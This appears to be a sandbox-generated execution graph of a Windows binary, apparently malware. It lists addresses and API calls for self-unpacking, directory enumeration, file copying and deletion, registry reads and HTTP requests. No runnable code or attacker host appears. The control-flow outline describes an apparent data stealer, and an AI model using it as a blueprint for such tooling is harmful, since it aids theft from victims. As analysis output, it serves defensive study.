                                                                                                                                                                                                                                                  execution_graph 14743 ad4829 14744 ad4831 14743->14744 14747 ad489e 14743->14747 14748 ad483a 14744->14748 14749 ad4849 14748->14749 14752 ad4fda 14749->14752 14757 ad4ff5 14752->14757 14753 ad4ffe CreateToolhelp32Snapshot 14754 ad501a Module32First 14753->14754 14753->14757 14755 ad5029 14754->14755 14758 ad4839 14754->14758 14759 ad4c99 14755->14759 14757->14753 14757->14754 14760 ad4cc4 14759->14760 14761 ad4cd5 VirtualAlloc 14760->14761 14762 ad4d0d 14760->14762 14761->14762 14762->14762 14796 408807 14797 413740 lstrcpyA 14796->14797 14798 408832 14797->14798 14799 406be0 5 API calls 14798->14799 14800 40883e 14799->14800 14801 41370e lstrcpyA 14800->14801 14802 40884d 14801->14802 14803 40885a InternetOpenA StrCmpCA 14802->14803 14804 408891 InternetConnectA 14803->14804 14805 4089f4 14803->14805 14804->14805 14806 4088ca HttpOpenRequestA 14804->14806 14807 41370e lstrcpyA 14805->14807 14809 408a2c InternetCloseHandle 14806->14809 14810 40891f 14806->14810 14818 408a24 14807->14818 14811 408a34 14809->14811 14812 408925 InternetSetOptionA 14810->14812 14813 40893a HttpSendRequestA HttpQueryInfoA 14810->14813 14815 41370e lstrcpyA 14811->14815 14812->14813 14813->14811 14814 40896e 14813->14814 14816 408a66 14814->14816 14824 40897f 14814->14824 14815->14818 14820 41370e lstrcpyA 14816->14820 14817 408a9b InternetCloseHandle 14821 413740 lstrcpyA 14817->14821 14819 408998 InternetReadFile 14819->14817 14819->14824 14820->14818 14821->14818 14822 413860 3 API calls 14822->14824 14823 4137c0 lstrcpyA 14823->14824 14824->14817 14824->14819 14824->14822 14824->14823 14911 40de0c 14912 41370e lstrcpyA 14911->14912 14913 40de2f 14912->14913 14914 413806 2 API calls 14913->14914 14915 40de3b 14914->14915 14916 413860 3 API calls 14915->14916 14917 40de72 14916->14917 14918 4137c0 lstrcpyA 14917->14918 14919 40de7e 14918->14919 14920 40de9d FindFirstFileA 14919->14920 14923 40e672 14920->14923 14932 40dead 14920->14932 14921 40e660 FindNextFileA 14921->14923 14921->14932 14922 41370e lstrcpyA 14922->14932 14924 40dfba StrCmpCA 14924->14932 14926 413806 lstrcpyA lstrcatA 14926->14932 14927 40dff5 StrCmpCA 14927->14932 14928 40e03a StrCmpCA 14928->14932 14929 4137c0 lstrcpyA 14929->14932 14930 413860 lstrlenA lstrcpyA lstrcatA 14930->14932 14931 413740 lstrcpyA 14931->14932 14932->14921 14932->14922 14932->14924 14932->14926 14932->14927 14932->14928 14932->14929 14932->14930 14932->14931 14933 414ab3 GetFileAttributesA 14932->14933 14935 40e386 14932->14935 14937 413778 lstrlenA 14932->14937 14933->14932 14934 413740 lstrcpyA 14934->14935 14935->14932 14935->14934 14936 40d820 127 API calls 14935->14936 14936->14935 14938 413790 14937->14938 14939 4137b8 14938->14939 14940 4137b0 lstrcpyA 14938->14940 14939->14932 14940->14939 14941 b0003c 14942 b00049 14941->14942 14956 b00e0f SetErrorMode SetErrorMode 14942->14956 14947 b00265 14948 b002ce VirtualProtect 14947->14948 14950 b0030b 14948->14950 14949 b00439 VirtualFree 14954 b005f4 LoadLibraryA 14949->14954 14955 b004be 14949->14955 14950->14949 14951 b004e3 LoadLibraryA 14951->14955 14953 b008c7 14954->14953 14955->14951 14955->14954 14957 b00223 14956->14957 14958 b00d90 14957->14958 14959 b00dad 14958->14959 14960 b00dbb GetPEB 14959->14960 14961 b00238 VirtualAlloc 14959->14961 14960->14961 14961->14947 15139 401011 VirtualAlloc 15140 401032 15139->15140 15141 40106a 15140->15141 15142 40103f memset VirtualFree 15140->15142 15142->15141 15143 40e6d2 15144 40e700 15143->15144 15145 413740 lstrcpyA 15144->15145 15146 40e810 15144->15146 15145->15144 15147 407d9e 15148 413740 lstrcpyA 15147->15148 15149 407dc6 15148->15149 15150 406be0 5 API calls 15149->15150 15151 407dd3 15150->15151 15152 41370e lstrcpyA 15151->15152 15153 407de3 15152->15153 15154 41370e lstrcpyA 15153->15154 15155 407dec 15154->15155 15156 41370e lstrcpyA 15155->15156 15157 407df5 15156->15157 15158 41370e lstrcpyA 15157->15158 15159 407dfe 15158->15159 15160 41370e lstrcpyA 15159->15160 15161 407e07 15160->15161 15162 407e17 InternetOpenA StrCmpCA 15161->15162 15163 407e44 15162->15163 15164 4085a5 InternetCloseHandle 15162->15164 15165 4148f3 4 API calls 15163->15165 15166 4085b6 15164->15166 15167 407e55 15165->15167 15169 40af38 2 API calls 15166->15169 15168 413806 2 API calls 15167->15168 15170 407e67 15168->15170 15171 4085c4 15169->15171 15172 4137c0 lstrcpyA 15170->15172 15173 413778 2 API calls 15171->15173 15176 408613 15171->15176 15177 407e6f 15172->15177 15174 4085d7 15173->15174 15175 413860 3 API calls 15174->15175 15178 4085ea 15175->15178 15180 413740 lstrcpyA 15176->15180 15182 413860 3 API calls 15177->15182 15179 4137c0 lstrcpyA 15178->15179 15181 4085f2 15179->15181 15195 4084fb 15180->15195 15184 4085f9 GetProcessHeap RtlFreeHeap 15181->15184 15183 407ead 15182->15183 15185 4137c0 lstrcpyA 15183->15185 15184->15176 15186 407eb5 15185->15186 15187 413860 3 API calls 15186->15187 15188 407ef3 15187->15188 15189 4137c0 lstrcpyA 15188->15189 15190 407efb 15189->15190 15191 413806 2 API calls 15190->15191 15192 407f0b 15191->15192 15193 4137c0 lstrcpyA 15192->15193 15194 407f13 15193->15194 15196 413860 3 API calls 15194->15196 15197 407f47 15196->15197 15198 4137c0 lstrcpyA 15197->15198 15199 407f4f 15198->15199 15200 413860 3 API calls 15199->15200 15201 407f63 15200->15201 15202 4137c0 lstrcpyA 15201->15202 15203 407f6b 15202->15203 15204 413860 3 API calls 15203->15204 15205 407f88 15204->15205 15206 413806 2 API calls 15205->15206 15207 407f94 15206->15207 15208 4137c0 lstrcpyA 15207->15208 15209 407f9c 15208->15209 15210 407faa InternetConnectA 15209->15210 15210->15164 15211 407ff0 HttpOpenRequestA 15210->15211 15212 40859e InternetCloseHandle 15211->15212 15213 40802e 15211->15213 15212->15164 15214 408034 InternetSetOptionA 15213->15214 15215 40804b 15213->15215 15214->15215 15216 413860 3 API calls 15215->15216 15217 40808e 15216->15217 15218 4137c0 lstrcpyA 15217->15218 15219 408096 15218->15219 15220 413806 2 API calls 15219->15220 15221 4080a9 15220->15221 15222 4137c0 lstrcpyA 15221->15222 15223 4080b1 15222->15223 15224 413860 3 API calls 15223->15224 15225 4080e5 15224->15225 15226 4137c0 lstrcpyA 15225->15226 15227 4080ed 15226->15227 15228 413860 3 API calls 15227->15228 15229 408102 15228->15229 15230 4137c0 lstrcpyA 15229->15230 15231 40810a 15230->15231 15232 413860 3 API calls 15231->15232 15233 40811f 15232->15233 15234 4137c0 lstrcpyA 15233->15234 15235 408127 15234->15235 15236 413860 3 API calls 15235->15236 15237 40815e 15236->15237 15238 4137c0 lstrcpyA 15237->15238 15239 408166 15238->15239 15240 413806 2 API calls 15239->15240 15241 40817c 15240->15241 15242 4137c0 lstrcpyA 15241->15242 15243 408184 15242->15243 15244 413860 3 API calls 15243->15244 15245 408199 15244->15245 15246 4137c0 lstrcpyA 15245->15246 15247 4081a1 15246->15247 15248 413860 3 API calls 15247->15248 15249 4081b5 15248->15249 15250 4137c0 lstrcpyA 15249->15250 15251 4081bd 15250->15251 15252 413806 2 API calls 15251->15252 15253 4081d0 15252->15253 15254 4137c0 lstrcpyA 15253->15254 15255 4081d8 15254->15255 15256 413860 3 API calls 15255->15256 15257 4081e8 15256->15257 15258 4137c0 lstrcpyA 15257->15258 15259 4081f0 15258->15259 15260 413860 3 API calls 15259->15260 15261 408205 15260->15261 15262 4137c0 lstrcpyA 15261->15262 15263 40820d 15262->15263 15264 413860 3 API calls 15263->15264 15265 408248 15264->15265 15266 4137c0 lstrcpyA 15265->15266 15267 408250 15266->15267 15268 413860 3 API calls 15267->15268 15269 408264 15268->15269 15270 4137c0 lstrcpyA 15269->15270 15271 40826c 15270->15271 15272 413860 3 API calls 15271->15272 15273 408281 15272->15273 15274 4137c0 lstrcpyA 15273->15274 15275 408289 15274->15275 15276 413860 3 API calls 15275->15276 15277 408299 15276->15277 15278 4137c0 lstrcpyA 15277->15278 15279 4082a1 15278->15279 15280 413860 3 API calls 15279->15280 15281 4082b5 15280->15281 15282 4137c0 lstrcpyA 15281->15282 15283 4082bd 15282->15283 15284 413806 2 API calls 15283->15284 15285 4082d0 15284->15285 15286 4137c0 lstrcpyA 15285->15286 15287 4082d8 15286->15287 15288 413860 3 API calls 15287->15288 15289 4082e8 15288->15289 15290 4137c0 lstrcpyA 15289->15290 15291 4082f0 15290->15291 15292 413860 3 API calls 15291->15292 15293 408305 15292->15293 15294 4137c0 lstrcpyA 15293->15294 15295 40830d 15294->15295 15296 413860 3 API calls 15295->15296 15297 408342 15296->15297 15298 4137c0 lstrcpyA 15297->15298 15299 40834a 15298->15299 15300 413860 3 API calls 15299->15300 15301 40835e 15300->15301 15302 4137c0 lstrcpyA 15301->15302 15303 408366 15302->15303 15304 413806 2 API calls 15303->15304 15305 408379 15304->15305 15306 4137c0 lstrcpyA 15305->15306 15307 408381 15306->15307 15308 408395 lstrlenA 15307->15308 15334 41398e 15308->15334 15310 4083a8 lstrlenA GetProcessHeap HeapAlloc 15311 4084aa InternetCloseHandle InternetCloseHandle InternetCloseHandle 15310->15311 15314 4083cc 15310->15314 15312 4084d7 15311->15312 15313 41370e lstrcpyA 15312->15313 15313->15195 15315 4083e6 lstrlenA memcpy 15314->15315 15335 41398e 15315->15335 15317 408402 lstrlenA 15318 408414 15317->15318 15319 408424 lstrlenA memcpy 15318->15319 15321 408434 15319->15321 15320 40844c lstrlenA 15320->15321 15321->15320 15322 408500 15321->15322 15323 40846e Sleep 15321->15323 15326 40850c GetProcessHeap HeapFree 15322->15326 15324 408483 15323->15324 15325 408488 15323->15325 15324->15321 15324->15325 15327 408494 GetProcessHeap HeapFree 15325->15327 15328 40851e InternetReadFile 15326->15328 15327->15311 15327->15328 15329 40858c InternetCloseHandle 15328->15329 15332 40853e 15328->15332 15329->15212 15330 413860 3 API calls 15330->15332 15331 4137c0 lstrcpyA 15331->15332 15332->15329 15332->15330 15332->15331 15333 40856e InternetReadFile 15332->15333 15333->15329 15333->15332 15334->15310 15335->15317 13959 4022a2 13960 4023a5 13959->13960 13961 4022b8 13959->13961 14039 413740 13960->14039 13961->13960 13971 413740 lstrcpyA 13961->13971 13974 401825 13961->13974 13964 413740 lstrcpyA 13965 4023c8 13964->13965 13966 413740 lstrcpyA 13965->13966 13967 4023d7 13966->13967 13968 413740 lstrcpyA 13967->13968 13969 4023ed 13968->13969 14043 4014c8 memset 13969->14043 13971->13961 13973 40240a 14089 41370e 13974->14089 13977 41370e lstrcpyA 13978 40184e 13977->13978 13991 40189e 13978->13991 14093 414ae0 SHGetFolderPathA 13978->14093 13981 4018b9 13984 413806 2 API calls 13981->13984 13982 40196c 13985 413806 2 API calls 13982->13985 13988 4018cc 13984->13988 13986 40197f 13985->13986 13990 413860 3 API calls 13986->13990 14104 413860 lstrlenA 13988->14104 13993 4019aa 13990->13993 13991->13981 13991->13982 13996 413806 2 API calls 13993->13996 13995 413806 2 API calls 13997 401908 13995->13997 13998 4019b9 13996->13998 14000 413860 3 API calls 13997->14000 13999 413860 3 API calls 13998->13999 14001 4019c8 13999->14001 14002 401942 14000->14002 14003 413806 2 API calls 14001->14003 14004 4137c0 lstrcpyA 14002->14004 14005 4019da 14003->14005 14007 40194e 14004->14007 14006 4137c0 lstrcpyA 14005->14006 14006->14007 14008 401a1c FindFirstFileA 14007->14008 14013 402237 14008->14013 14027 401a2f 14008->14027 14009 402207 FindNextFileA 14010 40221d FindClose 14009->14010 14009->14027 14011 40222c 14010->14011 14011->14013 14012 413806 lstrcpyA lstrcatA 14012->14027 14014 413806 lstrcpyA lstrcatA 14032 401af8 14014->14032 14015 413740 lstrcpyA 14015->14027 14016 414ab3 GetFileAttributesA 14016->14027 14017 41370e lstrcpyA 14017->14027 14018 401b9f FindFirstFileA 14018->14013 14018->14032 14020 401e83 FindNextFileA 14021 401ea1 FindClose 14020->14021 14020->14032 14021->14032 14022 41370e lstrcpyA 14022->14032 14023 413860 lstrlenA lstrcpyA lstrcatA 14023->14032 14024 4137c0 lstrcpyA 14024->14027 14025 413860 lstrlenA lstrcpyA lstrcatA 14025->14027 14026 4137c0 lstrcpyA 14026->14032 14027->14009 14027->14012 14027->14015 14027->14016 14027->14017 14027->14024 14027->14025 14027->14032 14028 4148f3 lstrcpyA lstrcpyA GetSystemTime lstrlenA 14028->14032 14029 4020ee CopyFileA 14030 413740 lstrcpyA 14029->14030 14030->14032 14031 4021cf DeleteFileA 14031->14032 14032->14009 14032->14014 14032->14018 14032->14020 14032->14022 14032->14023 14032->14026 14032->14028 14032->14029 14032->14031 14033 41797d 116 API calls 14032->14033 14034 401d7e CopyFileA 14032->14034 14036 40ae6d 6 API calls 14032->14036 14037 401e56 DeleteFileA 14032->14037 14038 413740 lstrcpyA 14032->14038 14108 414ab3 14032->14108 14033->14032 14035 413740 lstrcpyA 14034->14035 14035->14032 14036->14032 14037->14032 14038->14032 14040 413755 14039->14040 14041 4023b9 14040->14041 14042 413761 lstrcpyA 14040->14042 14041->13964 14042->14041 14044 4014f3 14043->14044 14113 401458 GetProcessHeap HeapAlloc RegOpenKeyExA 14044->14113 14046 40157c lstrcatA lstrlenA 14047 401590 14046->14047 14079 4017e1 14046->14079 14048 41370e lstrcpyA 14047->14048 14049 4015cf 14048->14049 14050 413860 3 API calls 14049->14050 14051 4015e0 14050->14051 14052 413860 3 API calls 14051->14052 14053 40163f 14052->14053 14054 4137c0 lstrcpyA 14053->14054 14055 401648 14054->14055 14056 41370e lstrcpyA 14055->14056 14057 401665 14056->14057 14058 413860 3 API calls 14057->14058 14059 401676 14058->14059 14060 413806 2 API calls 14059->14060 14061 401688 14060->14061 14062 413860 3 API calls 14061->14062 14063 4016b2 14062->14063 14116 4148f3 14063->14116 14065 4016bd 14066 413806 2 API calls 14065->14066 14067 4016c9 14066->14067 14068 4137c0 lstrcpyA 14067->14068 14069 4016d2 14068->14069 14070 401705 CopyFileA 14069->14070 14071 413740 lstrcpyA 14070->14071 14072 401723 14071->14072 14125 40ae6d 14072->14125 14074 401731 14075 4017bd 14074->14075 14076 413740 lstrcpyA 14074->14076 14077 4017d7 DeleteFileA 14075->14077 14078 401759 14076->14078 14077->14079 14080 413740 lstrcpyA 14078->14080 14079->13973 14081 401765 14080->14081 14082 413740 lstrcpyA 14081->14082 14083 401771 14082->14083 14084 413740 lstrcpyA 14083->14084 14085 40177c 14084->14085 14086 413740 lstrcpyA 14085->14086 14087 401792 14086->14087 14137 41797d 14087->14137 14090 41371c 14089->14090 14091 401842 14090->14091 14092 413730 lstrcpyA 14090->14092 14091->13977 14092->14091 14094 41370e lstrcpyA 14093->14094 14095 401884 14094->14095 14096 413806 14095->14096 14098 413830 14096->14098 14097 401896 14100 4137c0 14097->14100 14098->14097 14099 413844 lstrcpyA lstrcatA 14098->14099 14099->14097 14101 4137d4 14100->14101 14102 4137fe 14101->14102 14103 4137f6 lstrcpyA 14101->14103 14102->13991 14103->14102 14106 41388e 14104->14106 14105 4018f6 14105->13995 14106->14105 14107 4138a0 lstrcpyA lstrcatA 14106->14107 14107->14105 14112 41398e 14108->14112 14110 414ac7 GetFileAttributesA 14111 414ad8 14110->14111 14111->14032 14112->14110 14114 4014b3 RegCloseKey 14113->14114 14115 40149d RegQueryValueExA 14113->14115 14114->14046 14115->14114 14117 41370e lstrcpyA 14116->14117 14118 41490a 14117->14118 14119 41370e lstrcpyA 14118->14119 14120 41495b GetSystemTime 14119->14120 14121 4149e2 14120->14121 14123 41497a 14120->14123 14121->14065 14122 4149bd lstrlenA 14122->14123 14123->14121 14123->14122 14153 4138ba 14123->14153 14160 41398e 14125->14160 14127 40ae89 CreateFileA 14128 40af25 14127->14128 14129 40aeaf GetFileSizeEx 14127->14129 14128->14074 14130 40aec1 14129->14130 14131 40af1e CloseHandle 14129->14131 14130->14131 14132 40aec8 LocalAlloc 14130->14132 14131->14128 14132->14131 14133 40aee7 ReadFile 14132->14133 14134 40af13 LocalFree 14133->14134 14135 40af03 14133->14135 14134->14131 14135->14134 14136 40af0e 14135->14136 14136->14131 14138 4179a0 14137->14138 14139 4137c0 lstrcpyA 14138->14139 14140 4179d9 14139->14140 14141 4137c0 lstrcpyA 14140->14141 14142 4179fc 14141->14142 14143 4137c0 lstrcpyA 14142->14143 14144 417a0a 14143->14144 14145 4137c0 lstrcpyA 14144->14145 14146 417a18 14145->14146 14147 417a22 Sleep 14146->14147 14150 417a2f 14146->14150 14147->14146 14148 417a69 CreateThread WaitForSingleObject 14149 41370e lstrcpyA 14148->14149 14501 41a90d 14148->14501 14152 417a98 14149->14152 14150->14148 14161 420be0 14150->14161 14152->14075 14156 4138e6 14153->14156 14155 4138cc 14155->14123 14157 4138f5 14156->14157 14158 413916 14156->14158 14157->14158 14159 41393b lstrcpyA 14157->14159 14158->14155 14159->14158 14160->14127 14162 420c08 14161->14162 14163 420be8 14161->14163 14162->14148 14163->14162 14165 420040 14163->14165 14166 420058 14165->14166 14338 420066 14165->14338 14167 420075 lstrcpyA 14166->14167 14166->14338 14168 4200b8 14167->14168 14167->14338 14169 4200e6 14168->14169 14170 420117 strlen 14168->14170 14374 41f51e lstrlenA 14169->14374 14172 4200fb 14170->14172 14173 420155 14172->14173 14174 42016a 14172->14174 14175 42015a 14173->14175 14176 42017c 14173->14176 14399 41fb48 14174->14399 14178 420198 14175->14178 14179 42015f 14175->14179 14408 41fc76 14176->14408 14178->14338 14413 41fd52 GetLocalTime SystemTimeToFileTime 14178->14413 14392 41faaa 14179->14392 14180 420168 14184 4201a9 lstrcpyA lstrcpyA lstrlenA 14180->14184 14180->14338 14185 420223 lstrcpyA 14184->14185 14186 4201f3 lstrcatA 14184->14186 14416 41f988 14185->14416 14186->14185 14190 41f988 5 API calls 14191 42036f 14190->14191 14192 41f988 5 API calls 14191->14192 14193 42037c 14192->14193 14194 41f988 5 API calls 14193->14194 14195 420389 14194->14195 14196 41f988 5 API calls 14195->14196 14197 42039b 14196->14197 14198 41f988 5 API calls 14197->14198 14199 4203ad 14198->14199 14200 41f988 5 API calls 14199->14200 14201 4203bf 14200->14201 14202 41f988 5 API calls 14201->14202 14203 4203d1 14202->14203 14204 41f988 5 API calls 14203->14204 14205 4203e3 14204->14205 14206 41f988 5 API calls 14205->14206 14207 4203f5 14206->14207 14208 41f988 5 API calls 14207->14208 14209 420407 14208->14209 14210 41f988 5 API calls 14209->14210 14211 420419 14210->14211 14212 41f988 5 API calls 14211->14212 14213 42042b 14212->14213 14214 41f988 5 API calls 14213->14214 14215 42043d 14214->14215 14216 41f988 5 API calls 14215->14216 14217 42044f 14216->14217 14218 41f988 5 API calls 14217->14218 14219 420461 14218->14219 14220 41f988 5 API calls 14219->14220 14221 420473 14220->14221 14222 41f988 5 API calls 14221->14222 14223 420485 14222->14223 14224 41f988 5 API calls 14223->14224 14225 420497 14224->14225 14226 41f988 5 API calls 14225->14226 14227 4204a9 14226->14227 14228 41f988 5 API calls 14227->14228 14229 4204bb 14228->14229 14230 41f988 5 API calls 14229->14230 14231 4204cd 14230->14231 14232 41f988 5 API calls 14231->14232 14233 4204df 14232->14233 14234 41f988 5 API calls 14233->14234 14235 4204f1 14234->14235 14236 41f988 5 API calls 14235->14236 14237 420503 14236->14237 14238 41f988 5 API calls 14237->14238 14239 420515 14238->14239 14240 41f988 5 API calls 14239->14240 14241 420527 14240->14241 14242 41f988 5 API calls 14241->14242 14243 420539 14242->14243 14244 41f988 5 API calls 14243->14244 14245 42054b 14244->14245 14246 41f988 5 API calls 14245->14246 14247 42055d 14246->14247 14248 42057d 14247->14248 14249 41f988 5 API calls 14247->14249 14250 4205a7 14248->14250 14251 41f988 5 API calls 14248->14251 14254 4205d7 14248->14254 14249->14248 14252 4205c5 14250->14252 14253 4205e9 14250->14253 14255 42059d 14251->14255 14428 41feac 14252->14428 14257 420676 GetTickCount GetDesktopWindow srand 14253->14257 14258 42068f 14253->14258 14259 41feac CloseHandle 14254->14259 14255->14250 14255->14254 14257->14258 14260 42069b rand 14258->14260 14259->14338 14260->14260 14261 4206ad 14260->14261 14262 4206f3 14261->14262 14266 41f988 5 API calls 14261->14266 14263 420716 14262->14263 14264 420727 14262->14264 14432 41fee8 14263->14432 14267 420725 14264->14267 14441 41fffa 14264->14441 14266->14262 14269 41feac CloseHandle 14267->14269 14271 420756 14269->14271 14270 4207b2 14273 41f988 5 API calls 14270->14273 14270->14338 14271->14270 14272 42096b 14271->14272 14271->14338 14446 41fa56 14272->14446 14275 4207f0 14273->14275 14277 41f988 5 API calls 14275->14277 14278 4207fc 14277->14278 14281 41f988 5 API calls 14278->14281 14279 41f988 5 API calls 14280 4209ba 14279->14280 14282 41f988 5 API calls 14280->14282 14283 420808 14281->14283 14284 4209c6 14282->14284 14285 41f988 5 API calls 14283->14285 14286 41f988 5 API calls 14284->14286 14287 420814 14285->14287 14288 4209d2 14286->14288 14289 41f988 5 API calls 14287->14289 14290 41f988 5 API calls 14288->14290 14291 420823 14289->14291 14292 4209de 14290->14292 14293 41f988 5 API calls 14291->14293 14294 41f988 5 API calls 14292->14294 14295 420832 14293->14295 14296 4209ed 14294->14296 14297 41f988 5 API calls 14295->14297 14299 41f988 5 API calls 14296->14299 14298 420841 14297->14298 14300 41f988 5 API calls 14298->14300 14301 4209fc 14299->14301 14302 420850 14300->14302 14303 41f988 5 API calls 14301->14303 14304 41f988 5 API calls 14302->14304 14305 420a0b 14303->14305 14306 42085f 14304->14306 14307 41f988 5 API calls 14305->14307 14308 41f988 5 API calls 14306->14308 14309 420a1a 14307->14309 14310 42086e 14308->14310 14311 41f988 5 API calls 14309->14311 14313 41f988 5 API calls 14310->14313 14312 420a29 14311->14312 14314 41f988 5 API calls 14312->14314 14315 42087d 14313->14315 14316 420a38 14314->14316 14317 41f988 5 API calls 14315->14317 14318 41f988 5 API calls 14316->14318 14319 42088c 14317->14319 14320 420a47 14318->14320 14321 41f988 5 API calls 14319->14321 14322 41f988 5 API calls 14320->14322 14323 42089b 14321->14323 14324 420a56 14322->14324 14325 41f988 5 API calls 14323->14325 14326 41f988 5 API calls 14324->14326 14327 4208aa 14325->14327 14328 420a65 14326->14328 14329 41f988 5 API calls 14327->14329 14331 41f988 5 API calls 14328->14331 14330 4208b9 14329->14330 14332 41f988 5 API calls 14330->14332 14333 420a74 14331->14333 14373 4208c8 14332->14373 14334 41f988 5 API calls 14333->14334 14335 420a83 14334->14335 14337 41f988 5 API calls 14335->14337 14336 4208e4 ??_U@YAPAXI memcpy ??2@YAPAXI memcpy 14336->14338 14339 420a92 14337->14339 14338->14162 14338->14338 14340 41f988 5 API calls 14339->14340 14341 420aa1 14340->14341 14342 41f988 5 API calls 14341->14342 14343 420ab0 14342->14343 14344 41f988 5 API calls 14343->14344 14345 420abf 14344->14345 14346 41f988 5 API calls 14345->14346 14347 420ace 14346->14347 14348 41f988 5 API calls 14347->14348 14349 420add 14348->14349 14350 41f988 5 API calls 14349->14350 14351 420aec 14350->14351 14352 41f988 5 API calls 14351->14352 14353 420afb 14352->14353 14354 41f988 5 API calls 14353->14354 14355 420b0a 14354->14355 14356 41f988 5 API calls 14355->14356 14357 420b19 14356->14357 14358 41f988 5 API calls 14357->14358 14359 420b28 14358->14359 14360 41f988 5 API calls 14359->14360 14361 420b37 14360->14361 14362 41f988 5 API calls 14361->14362 14363 420b46 14362->14363 14364 41f988 5 API calls 14363->14364 14365 420b55 14364->14365 14366 41f988 5 API calls 14365->14366 14367 420b64 14366->14367 14368 41f988 5 API calls 14367->14368 14370 420b7d 14367->14370 14368->14370 14369 420b9f 14369->14338 14372 41fa56 SetFilePointer 14369->14372 14370->14338 14370->14369 14371 41f988 5 API calls 14370->14371 14371->14369 14372->14373 14373->14336 14373->14338 14375 41f533 14374->14375 14376 41f6e3 14375->14376 14377 41f56a StrCmpCA 14375->14377 14376->14172 14377->14376 14378 41f580 StrCmpCA 14377->14378 14378->14376 14380 41f5b5 StrCmpCA 14378->14380 14380->14376 14382 41f5ea StrCmpCA 14380->14382 14382->14376 14384 41f61f StrCmpCA 14382->14384 14384->14376 14386 41f654 StrCmpCA 14384->14386 14386->14376 14388 41f685 StrCmpCA 14386->14388 14388->14376 14390 41f6af StrCmpCA 14388->14390 14390->14376 14393 41fb26 14392->14393 14394 41fad6 CreateFileA 14392->14394 14393->14180 14394->14393 14395 41fafb 14394->14395 14396 41fb48 13 API calls 14395->14396 14397 41fb0f 14396->14397 14397->14393 14398 41fb16 CloseHandle 14397->14398 14398->14393 14400 41fb84 SetFilePointer 14399->14400 14405 41fc19 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14399->14405 14401 41fb96 14400->14401 14402 41fbcb GetLocalTime SystemTimeToFileTime 14400->14402 14450 41f76e GetFileInformationByHandle 14401->14450 14458 41f6ed FileTimeToSystemTime 14402->14458 14405->14180 14407 41fbb6 SetFilePointer 14407->14405 14409 41fcbe 14408->14409 14412 41fcfe __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14408->14412 14410 41fcc6 GetLocalTime SystemTimeToFileTime 14409->14410 14409->14412 14460 41f6ed FileTimeToSystemTime 14410->14460 14412->14180 14461 41f6ed FileTimeToSystemTime 14413->14461 14415 41fda9 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14415->14184 14417 41f99d 14416->14417 14426 41f9d9 14416->14426 14420 41f9b4 14417->14420 14423 41f9a9 ??_V@YAXPAX 14417->14423 14418 41fa01 14421 41fa0c memcpy 14418->14421 14427 41fa37 14418->14427 14419 41fa1e 14422 41fa25 WriteFile 14419->14422 14419->14427 14424 41f9b8 ??_U@YAPAXI 14420->14424 14425 41f9ca memcpy 14420->14425 14421->14427 14422->14427 14423->14424 14424->14425 14425->14426 14426->14418 14426->14419 14427->14190 14429 41fec7 14428->14429 14430 41feb9 14428->14430 14429->14338 14430->14429 14431 41fec0 CloseHandle 14430->14431 14431->14429 14433 41fef9 ??2@YAPAXI memset 14432->14433 14436 41ff20 14432->14436 14433->14436 14435 41ffc2 14470 41e990 14435->14470 14462 41d3ab 14436->14462 14442 420008 14441->14442 14444 42002c 14442->14444 14445 41f988 5 API calls 14442->14445 14495 41fe12 14442->14495 14444->14267 14445->14442 14447 41fa5c 14446->14447 14448 41fa66 14446->14448 14447->14448 14449 41fa80 SetFilePointer 14447->14449 14448->14279 14448->14338 14449->14448 14451 41f78d GetFileSize 14450->14451 14457 41f87c 14450->14457 14452 41f7d2 SetFilePointer ReadFile SetFilePointer ReadFile 14451->14452 14455 41f85c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14451->14455 14453 41f820 14452->14453 14452->14455 14454 41f82f SetFilePointer ReadFile 14453->14454 14453->14455 14454->14455 14455->14457 14459 41f6ed FileTimeToSystemTime 14455->14459 14457->14405 14457->14407 14458->14405 14459->14457 14460->14412 14461->14415 14463 41d3e0 14462->14463 14469 41d4d4 14462->14469 14464 41d3ee memset 14463->14464 14464->14464 14465 41d428 14464->14465 14466 41d440 memset 14465->14466 14466->14466 14467 41d478 14466->14467 14468 41d4a7 memset 14467->14468 14467->14469 14468->14467 14469->14435 14469->14469 14471 41e9c2 memset 14470->14471 14472 41e9ae 14470->14472 14473 41ea05 14471->14473 14472->14471 14474 41ea3b 14473->14474 14483 41ea87 14473->14483 14476 41f0a2 14474->14476 14479 41f0b3 14476->14479 14478 41f3c3 14478->14267 14480 41ea87 memcpy 14479->14480 14481 41f380 14479->14481 14482 41e2af memcpy 14479->14482 14480->14479 14487 41e2af 14481->14487 14482->14479 14486 41eaa5 14483->14486 14484 41ead7 memcpy 14484->14486 14485 41ebd0 14485->14474 14486->14484 14486->14485 14489 41e2da 14487->14489 14488 41e373 14488->14478 14489->14488 14491 41e4d6 14489->14491 14492 41e4e8 14491->14492 14493 41e5ab 14492->14493 14494 41e5dd memcpy 14492->14494 14493->14488 14494->14493 14496 41fe69 14495->14496 14497 41fe2b 14495->14497 14499 41fe70 ReadFile 14496->14499 14500 41fe62 14496->14500 14498 41fe3d memcpy 14497->14498 14497->14500 14498->14500 14499->14500 14500->14442 14512 41398e 14501->14512 14503 41a92d lstrlenA 14504 41aa23 14503->14504 14507 41a938 14503->14507 14505 413740 lstrcpyA 14505->14507 14507->14505 14508 4137c0 lstrcpyA 14507->14508 14509 41a9f3 StrCmpCA 14507->14509 14513 407382 14507->14513 14508->14507 14509->14507 14510 41aa06 14509->14510 14720 414805 14510->14720 14512->14503 14514 41370e lstrcpyA 14513->14514 14515 4073a7 14514->14515 14516 413740 lstrcpyA 14515->14516 14517 4073b7 14516->14517 14723 406be0 14517->14723 14519 4073c4 14731 414b70 14519->14731 14521 4073ec 14522 4073f9 lstrlenA 14521->14522 14523 407405 14522->14523 14524 414b70 7 API calls 14523->14524 14525 407411 14524->14525 14526 41370e lstrcpyA 14525->14526 14527 40741f 14526->14527 14528 41370e lstrcpyA 14527->14528 14529 407428 14528->14529 14530 41370e lstrcpyA 14529->14530 14531 407431 14530->14531 14532 41370e lstrcpyA 14531->14532 14533 40743a StrCmpCA 14532->14533 14534 407489 14533->14534 14535 40745c 14533->14535 14536 4148f3 4 API calls 14534->14536 14537 40746a InternetOpenA 14535->14537 14538 407497 14536->14538 14537->14534 14546 407cd0 14537->14546 14539 413806 2 API calls 14538->14539 14540 4074a9 14539->14540 14541 4137c0 lstrcpyA 14540->14541 14542 4074b1 14541->14542 14543 413860 3 API calls 14542->14543 14544 407506 14543->14544 14545 413806 2 API calls 